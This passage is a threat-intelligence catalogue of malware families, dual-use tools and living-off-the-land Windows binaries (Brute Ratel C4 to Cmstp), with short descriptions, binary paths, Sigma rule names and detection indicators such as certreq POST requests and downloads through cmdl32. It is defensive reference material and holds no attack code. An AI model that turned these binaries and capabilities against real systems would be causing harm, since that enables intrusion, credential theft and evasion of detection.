[Brute Ratel C4](https://app.tidalcyber.com/software/23043b44-69a6-5cdf-8f60-5a68068680c7) is a commercial red-teaming and adversarial attack simulation tool that first appeared in December 2020. [Brute Ratel C4](https://app.tidalcyber.com/software/23043b44-69a6-5cdf-8f60-5a68068680c7) was specifically designed to avoid detection by endpoint detection and response (EDR) and antivirus (AV) capabilities, and deploys agents called badgers to enable arbitrary command execution for lateral movement, privilege escalation, and persistence. In September 2022, a cracked version of [Brute Ratel C4](https://app.tidalcyber.com/software/23043b44-69a6-5cdf-8f60-5a68068680c7) was leaked in the cybercriminal underground, leading to its use by threat actors.<sup>[[Dark Vortex Brute Ratel C4](https://app.tidalcyber.com/references/47992cb5-df11-56c2-b266-6f58d75f8315)]</sup><sup>[[Palo Alto Brute Ratel July 2022](https://app.tidalcyber.com/references/a9ab0444-386b-5baf-84e1-0e6df4a21296)]</sup><sup>[[MDSec Brute Ratel August 2022](https://app.tidalcyber.com/references/dfd12595-0056-5b4a-b753-624fac1bb3a6)]</sup><sup>[[SANS Brute Ratel October 2022](https://app.tidalcyber.com/references/9544e762-6f72-59e7-8384-5bbef13bfe96)]</sup><sup>[[Trend Micro Black Basta October 2022](https://app.tidalcyber.com/references/6e4a1565-4a30-5a6b-961c-226a6f1967ae)]</sup>

The tag is: misp-galaxy:software="Brute Ratel C4"

BS2005

[BS2005](https://app.tidalcyber.com/software/c9e773de-0213-4b64-83fb-637060c8b5ed) is malware that was used by [Ke3chang](https://app.tidalcyber.com/groups/26c0925f-1a3c-4df6-b27a-62b9731299b8) in spearphishing campaigns since at least 2011. <sup>[[Mandiant Operation Ke3chang November 2014](https://app.tidalcyber.com/references/bb45cf96-ceae-4f46-a0f5-08cd89f699c9)]</sup>

The tag is: misp-galaxy:software="BS2005"

Backdoor.APT.FakeWinHTTPHelper - Associated Software

The tag is: misp-galaxy:software="Backdoor.APT.FakeWinHTTPHelper - Associated Software"

BUBBLEWRAP

[BUBBLEWRAP](https://app.tidalcyber.com/software/2be4e3d2-e8c5-4406-8041-2c17bdb3a547) is a full-featured, second-stage backdoor used by the [admin@338](https://app.tidalcyber.com/groups/8567136b-f84a-45ed-8cce-46324c7da60e) group. It is set to run when the system boots and includes functionality to check, upload, and register plug-ins that can further enhance its capabilities. <sup>[[FireEye admin@338](https://app.tidalcyber.com/references/f3470275-9652-440e-914d-ad4fc5165413)]</sup>

The tag is: misp-galaxy:software="BUBBLEWRAP"

build_downer

The tag is: misp-galaxy:software="build_downer"

Bumblebee

[Bumblebee](https://app.tidalcyber.com/software/cc155181-fb34-4aaf-b083-b7b57b140b7a) is a custom loader written in C++ that has been used by multiple threat actors, including possible initial access brokers, to download and execute additional payloads since at least March 2022. [Bumblebee](https://app.tidalcyber.com/software/cc155181-fb34-4aaf-b083-b7b57b140b7a) has been linked to ransomware operations including [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5), Quantum, and Mountlocker and derived its name from the appearance of "bumblebee" in the user-agent.<sup>[[Google EXOTIC LILY March 2022](https://app.tidalcyber.com/references/19d2cb48-bdb2-41fe-ba24-0769d7bd4d94)]</sup><sup>[[Proofpoint Bumblebee April 2022](https://app.tidalcyber.com/references/765b0ce9-7305-4b35-b5be-2f6f42339646)]</sup><sup>[[Symantec Bumblebee June 2022](https://app.tidalcyber.com/references/81bfabad-b5b3-4e45-ac1d-1e2e829fca33)]</sup>

The tag is: misp-galaxy:software="Bumblebee"

OSX.Bundlore - Associated Software

The tag is: misp-galaxy:software="OSX.Bundlore - Associated Software"

Bundlore

[Bundlore](https://app.tidalcyber.com/software/e9873bf1-9619-4c62-b4cf-1009e83de186) is adware written for macOS that has been in use since at least 2015. Though categorized as adware, [Bundlore](https://app.tidalcyber.com/software/e9873bf1-9619-4c62-b4cf-1009e83de186) has many features associated with more traditional backdoors.<sup>[[MacKeeper Bundlore Apr 2019](https://app.tidalcyber.com/references/4d631c9a-4fd5-43a4-8b78-4219bd371e87)]</sup>

The tag is: misp-galaxy:software="Bundlore"

Cachedump

[Cachedump](https://app.tidalcyber.com/software/7c03fb92-3cd8-4ce4-a1e0-75e47465e4bc) is a publicly available tool that extracts cached password hashes from a system's registry. <sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup>

The tag is: misp-galaxy:software="Cachedump"

CaddyWiper

[CaddyWiper](https://app.tidalcyber.com/software/62d0ddcd-790d-4d2d-9d94-276f54b40cf0) is a destructive data wiper that has been used in attacks against organizations in Ukraine since at least March 2022.<sup>[[ESET CaddyWiper March 2022](https://app.tidalcyber.com/references/9fa97444-311f-40c1-8728-c5f91634c750)]</sup><sup>[[Cisco CaddyWiper March 2022](https://app.tidalcyber.com/references/88fc1f96-2d55-4c92-a929-234248490c30)]</sup>

The tag is: misp-galaxy:software="CaddyWiper"

CALENDAR

The tag is: misp-galaxy:software="CALENDAR"

Calisto

[Calisto](https://app.tidalcyber.com/software/6b5b408c-4f9d-4137-bfb1-830d12e9736c) is a macOS Trojan that opens a backdoor on the compromised machine. [Calisto](https://app.tidalcyber.com/software/6b5b408c-4f9d-4137-bfb1-830d12e9736c) is believed to have first been developed in 2016. <sup>[[Securelist Calisto July 2018](https://app.tidalcyber.com/references/a292d77b-9150-46ea-b217-f51e091fdb57)]</sup> <sup>[[Symantec Calisto July 2018](https://app.tidalcyber.com/references/cefef3d8-94f5-4d94-9689-6ed38702454f)]</sup>

The tag is: misp-galaxy:software="Calisto"

CallMe

[CallMe](https://app.tidalcyber.com/software/352ee271-89e6-4d3f-9c26-98dbab0e2986) is a Trojan designed to run on Apple OSX. It is based on a publicly available tool called Tiny SHell. <sup>[[Scarlet Mimic Jan 2016](https://app.tidalcyber.com/references/f84a5b6d-3af1-45b1-ac55-69ceced8735f)]</sup>

The tag is: misp-galaxy:software="CallMe"

Cannon

[Cannon](https://app.tidalcyber.com/software/790e931d-2571-496d-9f48-322774a7d482) is a Trojan with variants written in C# and Delphi. It was first observed in April 2018. <sup>[[Unit42 Cannon Nov 2018](https://app.tidalcyber.com/references/8c634bbc-4878-4b27-aa18-5996ec968809)]</sup><sup>[[Unit42 Sofacy Dec 2018](https://app.tidalcyber.com/references/540c4c33-d4c2-4324-94cd-f57646666e32)]</sup>

The tag is: misp-galaxy:software="Cannon"

Anunak - Associated Software

The tag is: misp-galaxy:software="Anunak - Associated Software"

Carbanak

[Carbanak](https://app.tidalcyber.com/software/4cb9294b-9e4c-41b9-b640-46213a01952d) is a full-featured, remote backdoor used by a group of the same name ([Carbanak](https://app.tidalcyber.com/groups/72d9bea7-9ca1-43e6-8702-2fb7fb1355de)). It is intended for espionage, data exfiltration, and providing remote access to infected machines. <sup>[[Kaspersky Carbanak](https://app.tidalcyber.com/references/2f7e77db-fe39-4004-9945-3c8943708494)]</sup> <sup>[[FireEye CARBANAK June 2017](https://app.tidalcyber.com/references/39105492-6044-460c-9dc9-3d4473ee862e)]</sup>

The tag is: misp-galaxy:software="Carbanak"

Carberp

[Carberp](https://app.tidalcyber.com/software/df9491fd-5e24-4548-8e21-1268dce59d1f) is a credential and information stealing malware that has been active since at least 2009. [Carberp](https://app.tidalcyber.com/software/df9491fd-5e24-4548-8e21-1268dce59d1f)'s source code was leaked online in 2013, and subsequently used as the foundation for the [Carbanak](https://app.tidalcyber.com/software/4cb9294b-9e4c-41b9-b640-46213a01952d) backdoor.<sup>[[Trend Micro Carberp February 2014](https://app.tidalcyber.com/references/069e458f-d780-47f9-8ebe-21b195fe9b33)]</sup><sup>[[KasperskyCarbanak](https://app.tidalcyber.com/references/053a2bbb-5509-4aba-bbd7-ccc3d8074291)]</sup><sup>[[RSA Carbanak November 2017](https://app.tidalcyber.com/references/eb947d49-26f4-4104-8296-1552a273c9c3)]</sup>

The tag is: misp-galaxy:software="Carberp"

Carbon

[Carbon](https://app.tidalcyber.com/software/61f5d19c-1da2-43d1-ab20-51eacbca71f2) is a sophisticated, second-stage backdoor and framework that can be used to steal sensitive information from victims. [Carbon](https://app.tidalcyber.com/software/61f5d19c-1da2-43d1-ab20-51eacbca71f2) has been selectively used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) to target government and foreign affairs-related organizations in Central Asia.<sup>[[ESET Carbon Mar 2017](https://app.tidalcyber.com/references/5d2a3a81-e7b7-430d-b748-b773f89d3c77)]</sup><sup>[[Securelist Turla Oct 2018](https://app.tidalcyber.com/references/5b08ea46-e25d-4df9-9b91-f8e7a1d5f7ee)]</sup>

The tag is: misp-galaxy:software="Carbon"

Cardinal RAT

[Cardinal RAT](https://app.tidalcyber.com/software/fa23acef-3034-43ee-9610-4fc322f0d80b) is a potentially low volume remote access trojan (RAT) observed since December 2015. [Cardinal RAT](https://app.tidalcyber.com/software/fa23acef-3034-43ee-9610-4fc322f0d80b) is notable for its unique utilization of uncompiled C# source code and the Microsoft Windows built-in csc.exe compiler.<sup>[[PaloAlto CardinalRat Apr 2017](https://app.tidalcyber.com/references/8d978b94-75c9-46a1-812a-bafe3396eda9)]</sup>

The tag is: misp-galaxy:software="Cardinal RAT"

CARROTBALL

The tag is: misp-galaxy:software="CARROTBALL"

CARROTBAT

The tag is: misp-galaxy:software="CARROTBAT"

Catchamas

[Catchamas](https://app.tidalcyber.com/software/04deccb5-9850-45c3-a900-5d7039a94190) is a Windows Trojan that steals information from compromised systems. <sup>[[Symantec Catchamas April 2018](https://app.tidalcyber.com/references/155cc2df-adf4-4b5f-a377-272947e5757e)]</sup>

The tag is: misp-galaxy:software="Catchamas"

Caterpillar WebShell

The tag is: misp-galaxy:software="Caterpillar WebShell"

CC-Attack

CC-Attack is a publicly available script that automates the use of open, external proxy servers as part of denial of service flood attacks. Its use has been promoted among the members of the Killnet hacktivist collective.<sup>[[Flashpoint Glossary Killnet](/references/502cc03b-350b-4e2d-9436-364c43a0a203)]</sup>

The tag is: misp-galaxy:software="CC-Attack"

CCBkdr

[CCBkdr](https://app.tidalcyber.com/software/4eb0720c-7046-4ff1-adfd-ae603506e499) is malware that was injected into a signed version of CCleaner and distributed from CCleaner’s distribution website. <sup>[[Talos CCleanup 2017](https://app.tidalcyber.com/references/f2522cf4-dc65-4dc5-87e3-9e88212fcfe9)]</sup> <sup>[[Intezer Aurora Sept 2017](https://app.tidalcyber.com/references/b2999bd7-50d5-4d49-8893-8c0903d49104)]</sup>

The tag is: misp-galaxy:software="CCBkdr"

ccf32

[ccf32](https://app.tidalcyber.com/software/e00c2a0c-bbe5-4eff-b0ad-b2543456a317) is data collection malware that has been used since at least February 2019, most notably during the [FunnyDream](https://app.tidalcyber.com/campaigns/94587edf-0292-445b-8c66-b16629597f1e) campaign; there is also a similar x64 version.<sup>[[Bitdefender FunnyDream Campaign November 2020](https://app.tidalcyber.com/references/b62a9f2c-02ca-4dfa-95fc-5dc6ad9568de)]</sup>

The tag is: misp-galaxy:software="ccf32"

Cdb.exe - Associated Software

<sup>[[Cdb.exe - LOLBAS Project](/references/e61b035f-6247-47e3-918c-2892815dfddf)]</sup>

The tag is: misp-galaxy:software="Cdb.exe - Associated Software"

Cdb

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Debugging tool included with Windows Debugging Tools.

Author: Oddvar Moe

Paths:

* C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
* C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe

The tag is: misp-galaxy:software="Cdb"

CertOC.exe - Associated Software

<sup>[[CertOC.exe - LOLBAS Project](/references/b906498e-2773-419b-8c6d-3e974925ac18)]</sup>

The tag is: misp-galaxy:software="CertOC.exe - Associated Software"

CertOC

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used for installing certificates

Author: Ensar Samil

Paths:

* c:\windows\system32\certoc.exe
* c:\windows\syswow64\certoc.exe

Detection:

* Sigma: [proc_creation_win_certoc_load_dll.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml)
* IOC: Process creation with given parameter
* IOC: Unsigned DLL load via certoc.exe
* IOC: Network connection via certoc.exe<sup>[[CertOC.exe - LOLBAS Project](/references/b906498e-2773-419b-8c6d-3e974925ac18)]</sup>

The tag is: misp-galaxy:software="CertOC"

CertReq.exe - Associated Software

<sup>[[CertReq.exe - LOLBAS Project](/references/be446484-8ecc-486e-8940-658c147f6978)]</sup>

The tag is: misp-galaxy:software="CertReq.exe - Associated Software"

CertReq

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used for requesting and managing certificates

Author: David Middlehurst

Paths:

* C:\Windows\System32\certreq.exe
* C:\Windows\SysWOW64\certreq.exe

Detection:

* Sigma: [proc_creation_win_lolbin_susp_certreq_download.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml)
* IOC: certreq creates new files
* IOC: certreq makes POST requests<sup>[[CertReq.exe - LOLBAS Project](/references/be446484-8ecc-486e-8940-658c147f6978)]</sup>

The tag is: misp-galaxy:software="CertReq"

certutil.exe - Associated Software

The tag is: misp-galaxy:software="certutil.exe - Associated Software"

certutil

[certutil](https://app.tidalcyber.com/software/2fe21578-ee31-4ee8-b6ab-b5f76f97d043) is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services. <sup>[[TechNet Certutil](https://app.tidalcyber.com/references/8d095aeb-c72c-49c1-8482-dbf4ce9203ce)]</sup>

The tag is: misp-galaxy:software="certutil"

Chaes

[Chaes](https://app.tidalcyber.com/software/0c8efcd0-bfdf-4771-8754-18aac836c359) is a multistage information stealer written in several programming languages that collects login credentials, credit card numbers, and other financial information. [Chaes](https://app.tidalcyber.com/software/0c8efcd0-bfdf-4771-8754-18aac836c359) was first observed in 2020, and appears to primarily target victims in Brazil as well as other e-commerce customers in Latin America.<sup>[[Cybereason Chaes Nov 2020](https://app.tidalcyber.com/references/aaefa162-82a8-4b6d-b7be-fd31fafd9246)]</sup>

The tag is: misp-galaxy:software="Chaes"

Chaos

[Chaos](https://app.tidalcyber.com/software/92c88765-6b12-42cd-b1d7-f6a65b2236e2) is Linux malware that compromises systems by brute force attacks against SSH services. Once installed, it provides a reverse shell to its controllers, triggered by unsolicited packets. <sup>[[Chaos Stolen Backdoor](https://app.tidalcyber.com/references/8e6916c1-f102-4b54-b6a5-a58fed825c2e)]</sup>

The tag is: misp-galaxy:software="Chaos"

CharmPower

[CharmPower](https://app.tidalcyber.com/software/b1e3b56f-2e83-4cab-a1c1-16999009d056) is a PowerShell-based, modular backdoor that has been used by [Magic Hound](https://app.tidalcyber.com/groups/7a9d653c-8812-4b96-81d1-b0a27ca918b4) since at least 2022.<sup>[[Check Point APT35 CharmPower January 2022](https://app.tidalcyber.com/references/81dce660-93ea-42a4-902f-0c6021d30f59)]</sup>

The tag is: misp-galaxy:software="CharmPower"

HAYMAKER - Associated Software

Based on similarities in reported malware behavior and open source reporting, it is assessed that the malware named HAYMAKER by FireEye is likely the same as the malware ChChes. <sup>[[FireEye APT10 April 2017](https://app.tidalcyber.com/references/2d494df8-83e3-45d2-b798-4c3bcf55f675)]</sup> <sup>[[Twitter Nick Carr APT10](https://app.tidalcyber.com/references/0f133f2c-3b02-4b3b-a960-ef6a7862cf8f)]</sup>

The tag is: misp-galaxy:software="HAYMAKER - Associated Software"

Scorpion - Associated Software

<sup>[[PWC Cloud Hopper Technical Annex April 2017](https://app.tidalcyber.com/references/da6c8a72-c732-44d5-81ac-427898706eed)]</sup>

The tag is: misp-galaxy:software="Scorpion - Associated Software"

ChChes

[ChChes](https://app.tidalcyber.com/software/3f2283ef-67c2-49a3-98ac-1aa9f0499361) is a Trojan that appears to be used exclusively by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322). It was used to target Japanese organizations in 2016. Its lack of persistence methods suggests it may be intended as a first-stage tool. <sup>[[Palo Alto menuPass Feb 2017](https://app.tidalcyber.com/references/ba4f7d65-73ec-4726-b1f6-f2443ffda5e7)]</sup> <sup>[[JPCERT ChChes Feb 2017](https://app.tidalcyber.com/references/657b43aa-ead2-41d3-911a-d714d9b28e19)]</sup> <sup>[[PWC Cloud Hopper Technical Annex April 2017](https://app.tidalcyber.com/references/da6c8a72-c732-44d5-81ac-427898706eed)]</sup>

The tag is: misp-galaxy:software="ChChes"

Cherry Picker

[Cherry Picker](https://app.tidalcyber.com/software/2fd6f564-918e-4ee7-920a-2b4be858d11a) is a point of sale (PoS) memory scraper. <sup>[[Trustwave Cherry Picker](https://app.tidalcyber.com/references/e09f639e-bdd3-4e88-8032-f665e347272b)]</sup>

The tag is: misp-galaxy:software="Cherry Picker"

China Chopper

[China Chopper](https://app.tidalcyber.com/software/723c5ab7-23ca-46f2-83bb-f1d1e550122c) is a [Web Shell](https://app.tidalcyber.com/technique/05a5318f-476d-44c1-8a85-9466295d31dd) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server.<sup>[[Lee 2013](https://app.tidalcyber.com/references/6d1e2b0a-fed2-490b-be25-6580dfb7d6aa)]</sup> It has been used by several threat groups.<sup>[[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)]</sup><sup>[[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)]</sup><sup>[[CISA AA21-200A APT40 July 2021](https://app.tidalcyber.com/references/3a2dbd8b-54e3-406a-b77c-b6fae5541b6d)]</sup><sup>[[Rapid7 HAFNIUM Mar 2021](https://app.tidalcyber.com/references/cf05d229-c2ba-54f2-a79d-4b7c9185c663)]</sup>

The tag is: misp-galaxy:software="China Chopper"

Chinoxy

[Chinoxy](https://app.tidalcyber.com/software/7c36563a-9143-4766-8aef-4e1787e18d8c) is a backdoor that has been used since at least November 2018, during the [FunnyDream](https://app.tidalcyber.com/campaigns/94587edf-0292-445b-8c66-b16629597f1e) campaign, to gain persistence and drop additional payloads. According to security researchers, [Chinoxy](https://app.tidalcyber.com/software/7c36563a-9143-4766-8aef-4e1787e18d8c) has been used by Chinese-speaking threat actors.<sup>[[Bitdefender FunnyDream Campaign November 2020](https://app.tidalcyber.com/references/b62a9f2c-02ca-4dfa-95fc-5dc6ad9568de)]</sup>

The tag is: misp-galaxy:software="Chinoxy"

Chisel

Chisel is an open source tool that can be used for network tunneling.<sup>[[U.S. CISA AvosLocker October 11 2023](/references/d419a317-6599-4fc5-91d1-a4c2bc83bf6a)]</sup> According to its GitHub project page, "Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH".<sup>[[GitHub Chisel](/references/4a60fb46-06b7-44ea-a9f6-8d6fa81e9363)]</sup> Threat actors including ransomware operators and nation-state-aligned espionage actors have used Chisel as part of their operations.<sup>[[U.S. CISA AvosLocker October 11 2023](/references/d419a317-6599-4fc5-91d1-a4c2bc83bf6a)]</sup><sup>[[CISA AA20-259A Iran-Based Actor September 2020](/references/1bbc9446-9214-4fcd-bc7c-bf528370b4f8)]</sup>

The tag is: misp-galaxy:software="Chisel"

Chocolatey

Chocolatey is a command-line package manager for Microsoft Windows.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="Chocolatey"

Backdoor.SofacyX - Associated Software

The tag is: misp-galaxy:software="Backdoor.SofacyX - Associated Software"

SPLM - Associated Software

The tag is: misp-galaxy:software="SPLM - Associated Software"

Xagent - Associated Software

The tag is: misp-galaxy:software="Xagent - Associated Software"

X-Agent - Associated Software

The tag is: misp-galaxy:software="X-Agent - Associated Software"

webhp - Associated Software

The tag is: misp-galaxy:software="webhp - Associated Software"

CHOPSTICK

[CHOPSTICK](https://app.tidalcyber.com/software/01c6c49a-f7c8-44cd-a377-4dfd358ffeba) is a malware family of modular backdoors used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5). It has been used since at least 2012 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. It has both Windows and Linux variants. <sup>[[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)]</sup> <sup>[[ESET Sednit Part 2](https://app.tidalcyber.com/references/aefb9eda-df5a-437f-af2a-ec1b6c04628b)]</sup> <sup>[[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]</sup> <sup>[[DOJ GRU Indictment Jul 2018](https://app.tidalcyber.com/references/d65f371b-19d0-49de-b92b-94a2bea1d988)]</sup> It is tracked separately from the [X-Agent for Android](https://app.tidalcyber.com/software/).

The tag is: misp-galaxy:software="CHOPSTICK"

Chrommme

[Chrommme](https://app.tidalcyber.com/software/df77ed2a-f135-4f00-9a5e-79b7a6a2ed14) is a backdoor tool written using the Microsoft Foundation Class (MFC) framework that was first reported in June 2021; security researchers noted infrastructure overlaps with [Gelsemium](https://app.tidalcyber.com/software/9a117508-1d22-4fea-aa65-db670c13a5c9) malware.<sup>[[ESET Gelsemium June 2021](https://app.tidalcyber.com/references/ea28cf8c-8c92-48cb-b499-ffb7ff0e3cf5)]</sup>

The tag is: misp-galaxy:software="Chrommme"

Clambling

[Clambling](https://app.tidalcyber.com/software/4bac93bd-7e58-4ddb-a205-d99597b9e65e) is a modular backdoor written in C++ that has been used by [Threat Group-3390](https://app.tidalcyber.com/groups/79be2f31-5626-425e-844c-fd9c99e38fe5) since at least 2017.<sup>[[Trend Micro DRBControl February 2020](https://app.tidalcyber.com/references/4dfbf26d-023b-41dd-82c8-12fe18cb10e6)]</sup>

The tag is: misp-galaxy:software="Clambling"

CL_Invocation.ps1 - Associated Software

<sup>[[CL_Invocation.ps1 - LOLBAS Project](/references/a53e093a-973c-491d-91e3-bc7804d87b8b)]</sup>

The tag is: misp-galaxy:software="CL_Invocation.ps1 - Associated Software"

CL_Invocation

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Aero diagnostics script

Author: Oddvar Moe

Paths: * C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 * C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 * C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1

Detection: * Sigma: [proc_creation_win_lolbin_cl_invocation.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml) * Sigma: posh_ps_cl_invocation_lolscript.yml<sup>[[CL_Invocation.ps1 - LOLBAS Project](/references/a53e093a-973c-491d-91e3-bc7804d87b8b)]</sup>

The tag is: misp-galaxy:software="CL_Invocation"

CL_LoadAssembly.ps1 - Associated Software

<sup>[[CL_LoadAssembly.ps1 - LOLBAS Project](/references/31a14027-1181-49b9-87bf-78a65a551312)]</sup>

The tag is: misp-galaxy:software="CL_LoadAssembly.ps1 - Associated Software"

CL_LoadAssembly

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: PowerShell Diagnostic Script

Author: Jimmy (@bohops)

Paths: * C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1

Detection: * Sigma: proc_creation_win_lolbas_cl_loadassembly.yml<sup>[[CL_LoadAssembly.ps1 - LOLBAS Project](/references/31a14027-1181-49b9-87bf-78a65a551312)]</sup>

The tag is: misp-galaxy:software="CL_LoadAssembly"

CL_Mutexverifiers.ps1 - Associated Software

<sup>[[CL_Mutexverifiers.ps1 - LOLBAS Project](/references/75b89502-21ed-4920-95cc-212eaf17f281)]</sup>

The tag is: misp-galaxy:software="CL_Mutexverifiers.ps1 - Associated Software"

CL_Mutexverifiers

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Proxy execution with CL_Mutexverifiers.ps1

Author: Oddvar Moe

Paths: * C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 * C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 * C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 * C:\Windows\diagnostics\system\Video\CL_Mutexverifiers.ps1 * C:\Windows\diagnostics\system\Speech\CL_Mutexverifiers.ps1

Detection: * Sigma: proc_creation_win_lolbin_cl_mutexverifiers.yml<sup>[[CL_Mutexverifiers.ps1 - LOLBAS Project](/references/75b89502-21ed-4920-95cc-212eaf17f281)]</sup>

The tag is: misp-galaxy:software="CL_Mutexverifiers"

Clop

[Clop](https://app.tidalcyber.com/software/5321aa75-924c-47ae-b97a-b36f023abf2a) is a ransomware family that was first observed in February 2019 and has been used against retail, transportation and logistics, education, manufacturing, engineering, automotive, energy, financial, aerospace, telecommunications, professional and legal services, healthcare, and high tech industries. [Clop](https://app.tidalcyber.com/software/5321aa75-924c-47ae-b97a-b36f023abf2a) is a variant of the CryptoMix ransomware.<sup>[[Mcafee Clop Aug 2019](https://app.tidalcyber.com/references/458141bd-7dd2-41fd-82e8-7ea2e4a477ab)]</sup><sup>[[Cybereason Clop Dec 2020](https://app.tidalcyber.com/references/f54d682d-100e-41bb-96be-6a79ea422066)]</sup><sup>[[Unit42 Clop April 2021](https://app.tidalcyber.com/references/ce48d631-757c-480b-8572-b7d9f4d738c6)]</sup>

The tag is: misp-galaxy:software="Clop"

MiniDionis - Associated Software

The tag is: misp-galaxy:software="MiniDionis - Associated Software"

CloudLook - Associated Software

The tag is: misp-galaxy:software="CloudLook - Associated Software"

cmd.exe - Associated Software

The tag is: misp-galaxy:software="cmd.exe - Associated Software"

cmd

[cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) is the Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities. <sup>[[TechNet Cmd](https://app.tidalcyber.com/references/dbfc01fe-c300-4c27-ab9a-a20508c1e04b)]</sup>

Cmd.exe contains native functionality to perform many operations to interact with the system, including listing files in a directory (e.g., <code>dir</code> <sup>[[TechNet Dir](https://app.tidalcyber.com/references/f1eb8631-6bea-4688-a5ff-a388b1fdceb0)]</sup>), deleting files (e.g., <code>del</code> <sup>[[TechNet Del](https://app.tidalcyber.com/references/01fc44b9-0eb3-4fd2-b755-d611825374ae)]</sup>), and copying files (e.g., <code>copy</code> <sup>[[TechNet Copy](https://app.tidalcyber.com/references/4e0d4b94-6b4c-4104-86e6-499b6aa7ba78)]</sup>).

The tag is: misp-galaxy:software="cmd"

Cmdkey.exe - Associated Software

<sup>[[Cmdkey.exe - LOLBAS Project](/references/c9ca075a-8327-463d-96ec-adddf6f1a7bb)]</sup>

The tag is: misp-galaxy:software="Cmdkey.exe - Associated Software"

Cmdkey

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Creates, lists, and deletes stored user names and passwords or credentials.

Author: Oddvar Moe

Paths: * C:\Windows\System32\cmdkey.exe * C:\Windows\SysWOW64\cmdkey.exe

Detection: * Sigma: proc_creation_win_cmdkey_recon.yml<sup>[[Cmdkey.exe - LOLBAS Project](/references/c9ca075a-8327-463d-96ec-adddf6f1a7bb)]</sup>

The tag is: misp-galaxy:software="Cmdkey"

cmdl32.exe - Associated Software

<sup>[[cmdl32.exe - LOLBAS Project](/references/2628e452-caa1-4058-a405-7c4657fa3245)]</sup>

The tag is: misp-galaxy:software="cmdl32.exe - Associated Software"

cmdl32

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft Connection Manager Auto-Download

Author: Elliot Killick

Paths: * C:\Windows\System32\cmdl32.exe * C:\Windows\SysWOW64\cmdl32.exe

Detection: * Sigma: [proc_creation_win_lolbin_cmdl32.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml) * IOC: Reports of downloading from suspicious URLs in %TMP%\config.log * IOC: User agent "Microsoft® Connection Manager Vpn File Update"<sup>[[cmdl32.exe - LOLBAS Project](/references/2628e452-caa1-4058-a405-7c4657fa3245)]</sup>

The tag is: misp-galaxy:software="cmdl32"

Cmstp.exe - Associated Software

